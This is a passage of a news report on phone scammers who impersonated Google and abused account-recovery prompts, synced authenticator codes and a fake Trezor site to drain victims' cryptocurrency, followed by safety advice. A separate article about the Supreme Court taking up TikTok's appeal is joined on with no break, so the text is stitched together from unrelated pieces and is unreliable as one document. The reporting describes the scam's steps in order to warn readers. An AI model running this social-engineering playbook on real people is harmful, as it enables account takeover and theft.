The fake Google representative was polite, patient, professional and reassuring. Ashton told Griffin he was going to receive a notification that would allow him to regain control of the account from the hackers. Sure enough, a Google prompt instantly appeared on his phone asking, “Is it you trying to recover your account?”

Adam Griffin clicked “yes,” to an account recovery notification similar to this one on May 6.

Griffin said that after receiving the pop-up prompt from Google on his phone, he felt more at ease that he really was talking to someone at Google. In reality, the thieves caused the alert to appear on his phone merely by stepping through Google’s account recovery process for Griffin’s Gmail address.

“As soon as I clicked yes, I gave them access to my Gmail, which was synched to Google Photos,” Griffin said.

Unfortunately for Griffin, years ago he used Google Photos to store an image of the secret seed phrase that was protecting his cryptocurrency wallet. Armed with that phrase, the phishers could drain all of his funds.

“From there they were able to transfer approximately $450,000 out of my Exodus wallet,” Griffin recalled.

Griffin said just minutes after giving away access to his Gmail account he received a call from someone claiming to be with Coinbase, who likewise told him someone in Germany was trying to take over his account.

Griffin said a follow-up investigation revealed the attackers had used his Gmail account to gain access to his Coinbase account from a VPN connection in California, providing the multi-factor code from his Google Authenticator app. Unbeknownst to him at the time, Google Authenticator by default also makes the same codes available in one’s Google account online.

But when the thieves tried to move $100,000 worth of cryptocurrency out of his account, Coinbase sent an email stating that the account had been locked, and that he would have to submit additional verification documents before he could do anything with it.

GRAND THEFT AUTOMATED

Just days after Griffin was robbed, a scammer impersonating Google managed to phish 45 bitcoins — approximately $4,725,000 at today’s value — from Tony, a 42-year-old professional from northern California. Tony agreed to speak about his harrowing experience on condition that his last name not be used.

Tony got into bitcoin back in 2013 and has been investing in it ever since. On the evening of May 15, 2024, Tony was putting his three- and one-year-old boys to bed when he received a message from Google about an account security issue, followed by a phone call from a “Daniel Alexander” at Google who said his account was compromised by hackers.

Tony said he had just signed up for Google’s Gemini AI (an artificial intelligence platform formerly known as “Bard”), and mistakenly believed the call was part of that service. Daniel told Tony his account was being accessed by someone in Frankfurt, Germany, and that he could evict the hacker and recover access to the account by clicking “yes” to the prompt that Google was going to send to his phone.

The Google prompt arrived seconds later. And to his everlasting regret, Tony clicked the “Yes, it’s me” button.

Then came another call, this one allegedly from security personnel at Trezor, a company that makes encrypted hardware devices made to store cryptocurrency seed phrases securely offline. The caller said someone had submitted a request to Trezor to close his account, and they forwarded Tony a message sent from his Gmail account that included his name, Social Security number, date of birth, address, phone number and email address.

Tony said he began to believe then that his Trezor account truly was compromised. The caller convinced him to “recover” his account by entering his cryptocurrency seed phrase at a phishing website (verify-trezor[.]io) that mimicked the official Trezor website.

“At this point I go into fight or flight mode,” Tony recalled. “I’ve got my kids crying, my wife is like what the heck is going on? My brain went haywire. I put my seed phrase into a phishing site, and that was it.”

Almost immediately, all of the funds he was planning to save for retirement and for his children’s college fund were drained from his account.

“I made mistakes due to being so busy and not thinking correctly,” Tony told KrebsOnSecurity. “I had gotten so far away from the security protocols in bitcoin as life had changed so much since having kids.”

Tony shared this text message exchange of him pleading with his tormentors after being robbed of 45 bitcoins.

Tony said the theft left him traumatized and angry for months.

“All I was thinking about was protecting my boys and it ended up costing me everything,” he said. “Needless to say I’m devastated and have had to do serious therapy to get through it.”

MISERY LOVES COMPANY

Tony told KrebsOnSecurity that in the weeks following the theft of his 45 bitcoins, he became so consumed with rage and shame that he was seriously contemplating suicide. Then one day, while scouring the Internet for signs that others may have been phished by Daniel, he encountered Griffin posting on Reddit about the phone number involved in his recent bitcoin theft.

Griffin said the two of them were initially suspicious of each other — exchanging cautious messages for about a week — but he decided Tony was telling the truth after contacting the FBI agent that Tony said was working his case. Comparing notes, they discovered the fake Google security alerts they received just prior to their individual bitcoin thefts referenced the same phony “Google Support Case ID” number.

Adam Griffin and Tony said they received the same Google Support Case ID number in advance of their thefts. Both were sent via Google Forms, which sends directly from the google.com domain name.

More importantly, Tony recognized the voice of “Daniel from Google” when it was featured in an interview by Junseth, a podcaster who covers cryptocurrency scams. The same voice that had coaxed Tony out of his considerable cryptocurrency holdings just days earlier also had tried to phish Junseth, who played along for several minutes before revealing he knew it was a scam.

Daniel told Junseth he was a teenager and worked with other scam callers who had all met years ago on the game Minecraft, and that he recently enjoyed a run of back-to-back Gmail account compromises that led to crypto theft paydays.

“No one gets arrested,” Daniel enthused to Junseth in the May 7 podcast, which quickly went viral on social media. “It’s almost like there’s no consequences. I have small legal side hustles, like businesses and shit that I can funnel everything through. If you were to see me in real life, I look like a regular child going to school with my backpack and shit, you’d never expect this kid is stealing all this shit.”

Daniel explained that they often use an automated bot that initiates calls to targets warning that their account is experiencing suspicious activity, and that they should press “1” to speak with a representative. This process, he explained, essentially self-selects people who are more likely to be susceptible to their social engineering schemes. [It is possible — but not certain — that this bot Daniel referenced explains the incoming call to Griffin from Google Assistant that precipitated his bitcoin heist].

Daniel told Junseth he and his co-conspirators had just scored a $1.2 million theft that was still pending on the bitcoin investment platform SwanBitcoin. In response, Junseth tagged SwanBitcoin in a post about his podcast on Twitter/X, and the CEO of Swan quickly replied that they caught the $1.2 million transaction that morning.

Apparently, Daniel didn’t appreciate having his voice broadcast to the world (or his $1.2 million bitcoin heist disrupted) because according to Junseth someone submitted a baseless copyright infringement claim about it to Soundcloud, which was hosting the recording.

The complaint alleged the recording included a copyrighted song, but that wasn’t true: Junseth later posted a raw version of the recording to Telegram, and it clearly had no music in the background. Nevertheless, Soundcloud removed the audio file.

“All these companies are very afraid of copyright,” Junseth explained in a May 2024 interview with the podcast whatbitcoindid.com, which features some of the highlights from his recorded call with Daniel.

“It’s interesting because copyright infringement really is an act that you’re claiming against the publisher, but for some reason these companies have taken a very hard line against it, so if you even claim there’s copyrighted material in it they just take it down and then they leave it to you to prove that you’re innocent,” Junseth said. “In Soundcloud’s instance, part of declaring your innocence is you have to give them your home address and everything else, and it says right on there, ‘this will be provided to the person making the copyright claim.’”

AFTERMATH

When Junseth asked how potential victims could protect themselves, Daniel explained that if the target doesn’t have their Google Authenticator synced to their Google cloud account, the scammers can’t easily pivot into the victim’s accounts at cryptocurrency exchanges, as they did with Griffin.

By default, Google Authenticator syncs all one-time codes with a Gmail user’s account, meaning if someone gains access to your Google account, they can then access all of the one-time codes handed out by your Google Authenticator app.

To change this setting, open Authenticator on your mobile device, select your profile picture, and then choose “Use without an Account” from the menu. If you disable this, it’s a good idea to keep a printed copy of one-time backup codes, and to store those in a secure place.

You may also wish to download Google Authenticator to another mobile device that you control. Otherwise, if you turn off cloud synching and lose that sole mobile device with your Google Authenticator app, it could be difficult or impossible to recover access to your account if you somehow get locked out.

Griffin told KrebsOnSecurity he had no idea it was so easy for thieves to take over his account, and to abuse so many different Google services in the process.

“I know I definitely made mistakes, but I also know Google could do a lot better job protecting people,” he said.

In response to questions from KrebsOnSecurity, Google said it can confirm that this was a narrow phishing campaign, reaching a “very small group of people.”

“We’re aware of this narrow and targeted attack, and have hardened our defenses to block recovery attempts from this actor,” the company said in a written statement, which emphasized that the real Google will never call you.

“While these types of social engineering campaigns are constantly evolving, we are continuously working to harden our systems with new tools and technical innovations, as well as sharing updated guidance with our users to stay ahead of attackers,” the statement reads.

Both Griffin and Tony say they continue to receive “account security” calls from people pretending to work for Google or one of the cryptocurrency platforms.

“It’s like you get put on some kind of list, and then those lists get recycled over and over,” Tony said.

Griffin said that for several months after his ordeal, he accepted almost every cryptocurrency scam call that came his way, playing along in the vain hope of somehow tricking the caller into revealing details about who they are in real life. But he stopped after his taunting caused one of the scammers to start threatening him personally.

“I probably shouldn’t have, but I recorded two 30-minute conversations with these guys,” Griffin said, acknowledging that maybe it wasn’t such a great idea to antagonize cybercriminals who clearly already knew everything about him. “One guy I talked to about his personal life, and then his friend called me up and said he was going to dox me and do all this other bad stuff. My FBI contact later told me not to talk to these guys anymore.”

Sound advice. So is hanging up whenever anyone calls you about a security problem with one of your accounts. Even security-conscious people tend to underestimate the complex and shifting threat from phone-based phishing scams, but they do so at their peril.

When in doubt: Hang up, look up, and call back. If your response to these types of calls involves anything other than hanging up, researching the correct phone number, and contacting the entity that claims to be calling, you may be setting yourself up for a costly and humbling learning experience.

Understand that your email credentials are more than likely the key to unlocking your entire digital identity. Be sure to use a long, unique passphrase for your email address, and never pick a passphrase that you have ever used anywhere else (not even a variation on an old password).

Finally, it’s also a good idea to take advantage of the strongest multi-factor authentication methods offered. For Gmail/Google accounts, that includes the use of passkeys or physical security keys, which are heavily phishing resistant. For Google users holding measurable sums of cryptocurrency, the most secure option is Google’s free Advanced Protection program, which includes more extensive account security features but also comes with some serious convenience trade-offs.


Supreme Court to hear TikTok’s appeal against ban • The Register


The US Supreme Court has decided to consider made-in-China social network TikTok’s appeal against the law that requires it to shift to local ownership, or close, by January 19.

TikTok and its owner ByteDance have argued that the Protecting Americans from Foreign Adversary Controlled Applications Act (PFACAA) is unconstitutional because it will rob its 170 million US users of their right to free speech. The Biden administration introduced the law because it considers TikTok a threat to national security and citizens’ privacy: despite assurances that the social network stores data in the US, it operates tools that allow ByteDance workers in China to access personal information about US users.

A series of court challenges followed passage of the PFACAA, the most recent and significant of which was the early December decision by the US Court of Appeals for the District of Columbia that found the Act was justifiable on national security grounds, and disregarded TikTok’s free speech argument.

TikTok decided to make one last appeal, to the United States’ ultimate jurisdiction: the Supreme Court. The Supreme Court is not obliged to hear appeals, and usually decides to do so only when, according to its own guidance about its procedures, a matter “could have national significance, might harmonize conflicting decisions in the federal Circuit courts, and/or could have precedential value.”

In an order [PDF] published on Wednesday, the Supreme Court revealed it intends to consider whether the PFACAA violates the First Amendment and therefore the right to free speech.

Parties were given a December 27 deadline to file a 13,000-word brief, and a January 5 deadline to deliver a 6,000-word reply.

On January 10, the Court will stage a two-hour session to hear oral arguments.

When a decision will land is not known or spelled out in the order.

The Court might decide to rule quickly, as the PFACAA requires TikTok to find a new owner that has no ties to China or shut down on January 19 – just nine days after oral arguments will be heard.

Or it might decide that it can move more slowly, for two reasons. One is that the US president can authorize a one-off 90-day extension to the January 19 deadline – although the Biden administration has shown little interest in doing so. The other is that the inauguration of president-elect Donald Trump takes place on January 20, and there’s a school of thought that argues the new administration should have a chance to implement its policies.

TikTok welcomed the chance to put its case to the Supreme Court, in a brief statement that proclaimed “We believe the Court will find the TikTok ban unconstitutional so the over 170 million Americans on our platform can continue to exercise their free speech rights.”

The White House appears not to have commented on the matter.

No suitable US-based entity has signaled an interest in acquiring TikTok – an act that would mean it can continue operating stateside. Even if a buyer emerged, ByteDance is not keen to sell. ®
